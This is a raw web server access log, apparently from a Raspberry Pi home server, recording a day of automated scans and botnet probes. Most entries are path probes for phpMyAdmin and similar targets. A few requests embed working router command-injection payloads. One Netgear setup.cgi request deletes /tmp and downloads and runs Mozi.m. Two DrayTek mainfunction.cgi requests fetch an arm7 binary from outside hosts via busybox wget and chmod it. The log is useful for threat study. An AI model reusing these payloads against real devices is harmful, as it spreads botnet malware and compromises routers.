Wed Apr 15 06:25:07 MDT 2020 06:25:07 up 50 days, 10:53, 1 user, load average: 0.59, 0.30, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 50days 1:12m 2.34s /usr/bin/lxsession -s LXDE-pi -e LXDE 213.74.121.58 - - [15/Apr/2020:12:34:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:04 +0000] "GET /asdasdasd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:08 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:12 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:14 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:19 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:21 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 213.74.121.58 - - [15/Apr/2020:12:34:23 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 35.205.86.202 - - [15/Apr/2020:13:23:30 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 35.233.105.134 - - [15/Apr/2020:13:34:59 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 159.255.181.8 - - [15/Apr/2020:13:44:53 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" "" 
189.75.111.243 - - [15/Apr/2020:14:00:41 +0000] "GET / HTTP/1.1" 400 0 "" "" 178.93.62.153 - - [15/Apr/2020:14:12:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.128.190 - - [15/Apr/2020:14:18:11 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 193.19.100.114 - - [15/Apr/2020:14:21:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:20 +0000] "GET /asdasdasd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:20 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:20 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:21 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:21 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:24 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 193.19.100.114 - - [15/Apr/2020:14:21:25 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 71.6.232.4 - - [15/Apr/2020:14:59:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 206.223.174.86 - - [15/Apr/2020:15:14:14 +0000] "POST 
/cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET" 206.223.174.86 - - [15/Apr/2020:15:14:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.236.218.12 - - [15/Apr/2020:16:35:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.136.101.94 - - [15/Apr/2020:16:37:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 78.230.224.211 - - [15/Apr/2020:17:51:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 86.122.51.138 - - [15/Apr/2020:18:17:25 +0000] "GET / HTTP/1.1" 400 0 "" "" 185.153.197.103 - - [15/Apr/2020:18:34:37 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.153.197.103 - - [15/Apr/2020:18:41:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 194.213.123.246 - - [15/Apr/2020:18:47:57 +0000] "GET / HTTP/1.1" 400 0 "" "" 89.169.46.70 - - [15/Apr/2020:20:48:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 34.70.171.186 - - [15/Apr/2020:21:36:28 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu" 34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 185.202.1.16 - - [15/Apr/2020:22:08:01 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 185.202.1.16 - - [15/Apr/2020:22:08:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.202.1.16 - - [15/Apr/2020:22:08:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 208.91.109.18 - - 
[15/Apr/2020:22:40:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 185.237.177.191 - - [15/Apr/2020:23:35:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 84.236.64.130 - - [16/Apr/2020:00:03:42 +0000] "GET / HTTP/1.1" 400 0 "" "" 150.136.248.154 - - [16/Apr/2020:01:14:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /asdasdasd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:29 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 150.136.248.154 - - [16/Apr/2020:01:14:29 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 154.126.177.56 - - [16/Apr/2020:01:16:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 35.205.86.202 - - 
[16/Apr/2020:01:19:40 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 1.0.246.77 - - [16/Apr/2020:02:33:06 +0000] "GET / HTTP/1.1" 400 0 "" "" 162.243.132.176 - - [16/Apr/2020:03:38:00 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 176.113.115.249 - - [16/Apr/2020:03:48:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 107.6.169.250 - - [16/Apr/2020:04:35:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 " 13.65.201.223 - - [16/Apr/2020:04:45:21 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 13.65.201.223 - - [16/Apr/2020:04:45:21 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 189.129.135.99 - - [16/Apr/2020:05:17:05 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 189.129.135.99 - - [16/Apr/2020:05:17:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 13.65.201.223 - - [16/Apr/2020:05:20:57 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 13.65.201.223 - - [16/Apr/2020:05:20:57 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 104.35.227.239 - - [16/Apr/2020:06:58:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.35.227.239 - - [16/Apr/2020:06:58:13 +0000] "GET / HTTP/1.1" 200 25000 "" "" 220.189.199.83 - - [16/Apr/2020:07:55:28 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 220.189.199.83 - - [16/Apr/2020:07:55:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 91.106.64.249 - - [16/Apr/2020:08:12:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 54.154.233.206 - - [16/Apr/2020:08:48:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Apache-HttpClient/4.5.1 (Java/1.8.0_192)" 54.154.233.206 - - [16/Apr/2020:08:48:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Java/1.8.0_192" 36.67.104.11 - - 
[16/Apr/2020:09:21:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 120.72.16.194 - - [16/Apr/2020:09:36:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 113.96.131.198 - - [16/Apr/2020:09:56:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.67.70.85 - - [16/Apr/2020:10:25:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 80.24.44.11 - - [16/Apr/2020:10:37:18 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 80.24.44.11 - - [16/Apr/2020:10:37:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 74.84.255.220 - - [16/Apr/2020:10:57:24 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 74.84.255.220 - - [16/Apr/2020:10:57:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 61.219.11.153 - - [16/Apr/2020:12:23:51 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" Thu Apr 16 06:25:06 MDT 2020 06:25:06 up 51 days, 10:53, 1 user, load average: 0.35, 0.22, 0.19 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 51days 1:13m 2.34s /usr/bin/lxsession -s LXDE-pi -e LXDE